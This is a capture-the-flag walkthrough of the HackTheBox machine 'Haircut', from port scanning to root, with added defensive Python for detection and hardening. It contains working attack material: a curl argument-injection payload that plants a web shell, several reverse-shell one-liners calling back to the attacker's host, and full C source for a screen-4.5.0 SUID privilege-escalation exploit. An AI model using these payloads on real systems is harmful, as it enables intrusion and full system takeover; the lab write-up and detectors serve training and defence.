Introduction


Haircut is a medium-rated machine with a user rating of 4.3, which is decent. I do not think the box is hard enough to deserve a medium rating, but let us just start with the enumeration of the machine.

Enumeration


I start with an Nmap scan and then enumerate the open ports deeper.

Nmap Scan


Here is a simple scan of all ports:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ sudo nmap -sS  -p- haircut.htb -Pn --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-07 12:54 CEST
Warning: 10.10.10.24 giving up on port because retransmission cap hit (10).
Nmap scan report for haircut.htb (10.10.10.24)
Host is up (0.068s latency).
Not shown: 64294 closed ports, 1239 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 133.27 seconds

On the two open ports, I perform a deep scan using the -A flag:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ sudo nmap -A  -p 22,80 haircut.htb              
[sudo] password for user: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-07 12:58 CEST
Nmap scan report for haircut.htb (10.10.10.24)
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), 
Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), 
Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   ... 10
11  43.45 ms haircut.htb (10.10.10.24)

Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds

Service Enumeration


The SSH version is not vulnerable, so I only need to enumerate the webserver. Here are the results of the gobuster scan:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ gobuster dir -u http://haircut.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://haircut.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,log,txt
[+] Timeout:                 10s
===============================================================
2021/09/07 12:45:00 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 144]
/uploads              (Status: 301) [Size: 194] [--> http://haircut.htb/uploads/]
/test.html            (Status: 200) [Size: 223]                                  
/hair.html            (Status: 200) [Size: 141]
/exposed.php          (Status: 200) [Size: 446]

The HTML files contain only an image, which does not hide any steganography. So I visited exposed.php, which lets me fetch arbitrary websites. The name is also kinda sus.

Exploitation


This probably runs curl in the background. Curl accepts the -o argument to write the downloaded content to a file. I can use this to download my web shell into the uploads directory:

http://10.10.16.7/webshell.php -o ./uploads/webshell.php

This injects an extra argument into the curl command and downloads a file from my own webserver into the uploads directory of the vulnerable webserver. I can now call the web shell and try to get a reverse shell:

http://haircut.htb/uploads/webshell.php?c=nc%20-e%20/bin/sh%2010.10.16.7%204444

This shell is really buggy, so I just use another reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 5555 >/tmp/f

The page hangs when I send the new reverse shell payload to the server, so I look at the netcat listener:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.24] 33516
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@haircut:~/html/uploads$ export TERM=xterm
export TERM=xterm
www-data@haircut:~/html/uploads$ ^Z
zsh: suspended  nc -lvnp 5555
                                                         
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ stty raw -echo; 
[1]  + continued  nc -lvnp 5555

www-data@haircut:~/html/uploads$ ls
bounce.jpg  webshell.php

There is the shell as www-data; I already stabilized it with python3 and stty. Maybe I can read the user flag.
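Both the argument injection in exposed.php and the calls to the uploaded web shell leave traces a defender can act on. The Python below is an added example, not code from the post or from the box: a hardened way to pass a user-supplied URL to curl, shown beside the naive shell-string pattern, and a small detector run over constructed nginx access-log lines. The parameter name url, the log lines and the attack strings are assumptions; the real source of exposed.php is not shown on the page.

```python
import re
import shlex
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed attack string, modelled on the payload sent to exposed.php above.
INJECTED = "http://10.10.16.7/webshell.php -o ./uploads/webshell.php"


def naive_curl_command(url: str) -> list[str]:
    """The vulnerable pattern: the parameter is spliced into a shell string,
    so the shell splits it on whitespace and curl receives extra options.
    Only the resulting argv is returned; nothing is executed."""
    return shlex.split("curl " + url)


class RejectedUrl(ValueError):
    """Raised when a fetch URL fails validation."""


ALLOWED_SCHEMES = {"http", "https"}
# RFC 3986 characters only: no whitespace, quotes or control characters.
URL_CHARS = re.compile(r"[A-Za-z0-9._~:/?#\[\]@!$&()*+,;=%-]+")


def safe_curl_argv(url: str) -> list[str]:
    """Hardened replacement (hypothetical, not the box's code): validate the
    URL, then hand it to curl as one argv element via subprocess.run(argv),
    so no shell ever parses it."""
    if not URL_CHARS.fullmatch(url):
        raise RejectedUrl("URL contains whitespace, quotes or control characters")
    if url.startswith("-"):
        raise RejectedUrl("URL must not look like a curl option")
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        raise RejectedUrl(f"unparsable URL: {exc}") from exc
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        raise RejectedUrl("only absolute http(s) URLs are accepted")
    # "--" ends curl's option parsing: defence in depth behind the checks above
    return ["curl", "--max-time", "10", "--", url]


def is_accepted(url: str) -> bool:
    """True if safe_curl_argv() would let the URL through."""
    try:
        safe_curl_argv(url)
    except RejectedUrl:
        return False
    return True


# Constructed nginx access-log lines (combined format).  The "url" parameter
# name is an assumption; the page does not show what exposed.php calls it.
SAMPLE_LOG = """\
10.10.14.3 - - [07/Sep/2021:12:40:11 +0200] "GET /exposed.php?url=http%3A%2F%2Fexample.com%2F HTTP/1.1" 200 446 "-" "Mozilla/5.0"
10.10.16.7 - - [07/Sep/2021:13:02:45 +0200] "GET /exposed.php?url=http%3A%2F%2F10.10.16.7%2Fwebshell.php+-o+.%2Fuploads%2Fwebshell.php HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.10.16.7 - - [07/Sep/2021:13:03:10 +0200] "GET /uploads/webshell.php?c=nc%20-e%20/bin/sh%2010.10.16.7%204444 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.3 - - [07/Sep/2021:13:05:00 +0200] "GET /hair.html HTTP/1.1" 200 141 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
OPTION_INJECTION = re.compile(r"(?:^|\s)--?[A-Za-z]")                   # " -o", " --output"
SHELL_TOKENS = re.compile(r"\b(?:nc|netcat|mkfifo)\b|/bin/(?:ba)?sh\b")  # commands seen in c=


def analyse_request(target: str) -> list[str]:
    """Return the reasons a request target (path + query) looks malicious."""
    reasons = []
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    if path.endswith("/exposed.php"):
        # parse_qsl decodes %xx and "+" so the injected " -o" becomes visible
        for _, value in parse_qsl(parts.query, keep_blank_values=True):
            if OPTION_INJECTION.search(value):
                reasons.append("curl option injected into fetch URL")
                break
    if path.startswith("/uploads/") and path.endswith(".php"):
        reasons.append("PHP executed from the upload directory")
    if SHELL_TOKENS.search(unquote_plus(parts.query)):
        reasons.append("shell command in query string")
    return reasons


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Run analyse_request over every parsable line; yields (ip, path, reasons)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyse_request(m["target"])
        if reasons:
            findings.append((m["ip"], unquote_plus(urlsplit(m["target"]).path), reasons))
    return findings


if __name__ == "__main__":
    print("naive argv:", naive_curl_command(INJECTED))
    print("accepted:", is_accepted(INJECTED), is_accepted("https://example.com/"))
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path, "->", "; ".join(reasons))
```

In PHP the equivalent of the argv list is validating the URL and then wrapping it with escapeshellarg(); note that escapeshellarg() alone does not stop a value such as "-o file" from being parsed by curl as an option, which is why the leading-dash check and curl's "--" separator are still needed. If exposed.php takes the URL by POST rather than GET, the body never reaches the access log and the detector has to read the application's or a reverse proxy's log instead.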

User Flag


The user www-data may have permissions to read files from the home directory of user maria, where the user flag lies:

www-data@haircut:/home$ cd maria
www-data@haircut:/home/maria$ ls
Desktop    Downloads  Pictures  Templates  user.txt
Documents  Music      Public    Videos
www-data@haircut:/home/maria$ cat user.txt
bf**************************0e0c

It worked: I was able to read the flag.

Privesc


I use LinPEAS to scan the machine for possible privesc vulnerabilities.

LinPEAS reports the sudo version as vulnerable, but I cannot use the sudo command because it asks for the password of www-data, which I do not have:

www-data@haircut:/tmp$ sudo -u#-1 bash 
[sudo] password for www-data: 
www-data@haircut:/tmp$

I do not want to try the kernel exploit yet, only if I get stuck. There is a SUID binary that I do not recognise: /usr/bin/screen-4.5.0. I searched the internet for ways to exploit this SUID binary and found a local privilege escalation exploit for it:

Offensive Security’s Exploit Database Archive

The exploit did not work correctly on the machine, but by following the steps of the PoC by hand I found a workaround to exploit this vulnerability.

First, I create two files. The first one is rootshell.c:

#include <stdio.h>
#include <stdlib.h>   /* system(); the original file lacked these headers, hence the warnings below */
#include <unistd.h>   /* setuid(), setgid() */
int main(void) {
        /* the binary is made root-owned and SUID later, so these succeed */
        setuid(0);
        setgid(0);
        /* spawn a reverse shell back to my listener */
        system("nc -e /bin/bash 10.10.16.7 4444");
        return 0;
}

Now, compile this script:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ gcc rootshell.c -o rootshell   
rootshell.c: In function ‘main’:
rootshell.c:3:9: warning: implicit declaration of function ‘setuid’ 
[-Wimplicit-function-declaration]
    3 |         setuid(0);
      |         ^~~~~~
rootshell.c:4:9: warning: implicit declaration of function ‘setgid’ 
[-Wimplicit-function-declaration]
    4 |         setgid(0);
      |         ^~~~~~
rootshell.c:5:9: warning: implicit declaration of function ‘system’ 
[-Wimplicit-function-declaration]
    5 |         system("nc -e /bin/bash 10.10.16.7 4444");
      |         ^~~~~~

You can ignore the warnings; they only mean that the headers declaring these functions were not included. Next, I create libhax.c (this is also missing on the machine):

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* chmod(); missing in the original, hence the warning below */
#include <unistd.h>     /* chown(), unlink() */
/* runs automatically when the library is loaded via /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    /* when loaded into the SUID screen binary this runs as root */
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    /* remove the preload entry again so no other program loads this library */
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

I compile that script too:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ gcc -fPIC -shared -ldl -o libhax.so libhax.c 
libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ 
[-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~

Now, I can download these two files onto the machine (the exploit expects them under /tmp, so make sure they end up as /tmp/libhax.so and /tmp/rootshell):

www-data@haircut:/tmp/screenroot$ wget http://10.10.16.7/libhax.so
--2021-09-07 14:57:35--  http://10.10.16.7/libhax.so
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15560 (15K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  15.20K  --.-KB/s    in 0.06s   

2021-09-07 14:57:35 (256 KB/s) - 'libhax.so' saved [15560/15560]

www-data@haircut:/tmp/screenroot$ wget http://10.10.16.7/rootshell
--2021-09-07 14:57:48--  http://10.10.16.7/rootshell
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16088 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  15.71K  --.-KB/s    in 0.02s   

2021-09-07 14:57:48 (734 KB/s) - 'rootshell' saved [16088/16088]

www-data@haircut:/tmp/screenroot$ ls
libhax.so  rootshell

Note: you need to start a webserver on your attacking machine first so that wget can fetch the files. To exploit the system, abuse the SUID screen binary to write the path of libhax.so into /etc/ld.so.preload through its logfile option, and you should be good:

www-data@haircut:/tmp$ cd /etc
www-data@haircut:/etc$ umask 000
www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
www-data@haircut:/etc$ screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
www-data@haircut:/etc$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@haircut:/etc$ /tmp/rootshell

After the command was executed, I check my netcat listener, where a reverse shell has spawned:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.24] 55844
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The shell that spawned is a root shell.
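The privesc chain above rests on three things a defender can check for: an /etc/ld.so.preload that exists at all, an unfamiliar SUID-root binary (screen-4.5.0 and, after the exploit, /tmp/rootshell), and a home directory that www-data was able to read. The Python below is an added example, not code from the post or the box. The trusted library directories and the SUID baseline are assumptions, the file and directory metadata are constructed, and the preload contents reproduce what the screen command most likely left behind: the window's pty converts the echoed newline to CR LF, so the first token is a bare carriage return, which is my reading of why the loader warning on the page starts with "' from /etc/ld.so.preload".

```python
import os
import re
import stat

# Directories a packaged preload library would live in: an assumed baseline
# for this check, not something the box or the post defines.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")
# glibc's loader splits ld.so.preload on these separators and skips empty tokens
PRELOAD_SEPARATORS = re.compile(r"[ :\t\n]+")

# Constructed: what the screen step most likely leaves in /etc/ld.so.preload.
# The echoed "\n" comes back through the window's pty as CR LF, so the first
# token is a lone "\r" that the loader cannot open; the CR is what overwrote
# the start of the warning line in the post.
PLANTED_PRELOAD = "\r\n/tmp/libhax.so"


def check_preload(content: str) -> list[str]:
    """Audit the text of /etc/ld.so.preload.  A stock system has no such file,
    so any content is worth a look; entries outside the packaged library
    directories or containing control characters are reported."""
    findings = []
    for token in PRELOAD_SEPARATORS.split(content):
        if not token:
            continue
        shown = token.encode("unicode_escape").decode()
        if any(ord(ch) < 0x20 for ch in token):
            findings.append(f"{shown}: control character in entry, loader cannot open it")
        elif not token.startswith(TRUSTED_LIB_DIRS):
            findings.append(f"{shown}: outside the trusted library directories")
    return findings


# Constructed baseline of SUID-root binaries expected on this kind of host;
# derive the real one from a clean image of the same release.
EXPECTED_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
                 "/usr/bin/newgrp", "/usr/bin/gpasswd", "/bin/su", "/bin/mount",
                 "/bin/umount", "/bin/ping", "/bin/fusermount"}

# Constructed (path, st_mode, st_uid) triples, as os.lstat would report them.
SAMPLE_FILES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/screen-4.5.0", 0o104755, 0),  # the unfamiliar SUID binary from the post
    ("/tmp/rootshell", 0o104755, 0),         # what libhax.so's constructor produces
    ("/bin/ls", 0o100755, 0),
]
# Constructed (path, st_mode) pairs for home directories.
SAMPLE_HOMES = [("/home/maria", 0o40755), ("/home/admin", 0o40750)]


def suid_outliers(entries, expected=EXPECTED_SUID) -> list[str]:
    """Root-owned SUID files that are not in the baseline (e.g. screen-4.5.0)."""
    return [path for path, mode, uid in entries
            if mode & stat.S_ISUID and uid == 0 and path not in expected]


def lax_home_dirs(entries) -> list[str]:
    """Home directories that any local user, such as www-data, can read."""
    return [path for path, mode in entries if mode & stat.S_IROTH]


def collect_files(root: str) -> list[tuple[str, int, int]]:
    """Gather (path, mode, uid) triples from the live host for suid_outliers()."""
    out = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            out.append((full, st.st_mode, st.st_uid))
    return out


if __name__ == "__main__":
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            print("ld.so.preload:", check_preload(fh.read()) or "present but clean")
    else:
        print("ld.so.preload: absent (expected)")
    print("unexpected SUID:", suid_outliers(collect_files("/usr/bin") + collect_files("/bin")))
    homes = []
    if os.path.isdir("/home"):
        homes = [(os.path.join("/home", d), os.lstat(os.path.join("/home", d)).st_mode)
                 for d in os.listdir("/home")]
    print("world-readable homes:", lax_home_dirs(homes))
```

Run it as root on the host to audit the live system; the constructed samples only exercise the checks. A write to /etc/ld.so.preload by anything other than the package manager is also a good candidate for a file-integrity or audit rule, since the exploit both creates and deletes the file within seconds.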

Root Flag


I can now read the root flag:

cat /root/root.txt
22**************************d917

Conclusions


It was very easy to get initial access; the privesc was a bit harder because I had to find a workaround for the exploit. All in all a great box to practise for the OSCP exam.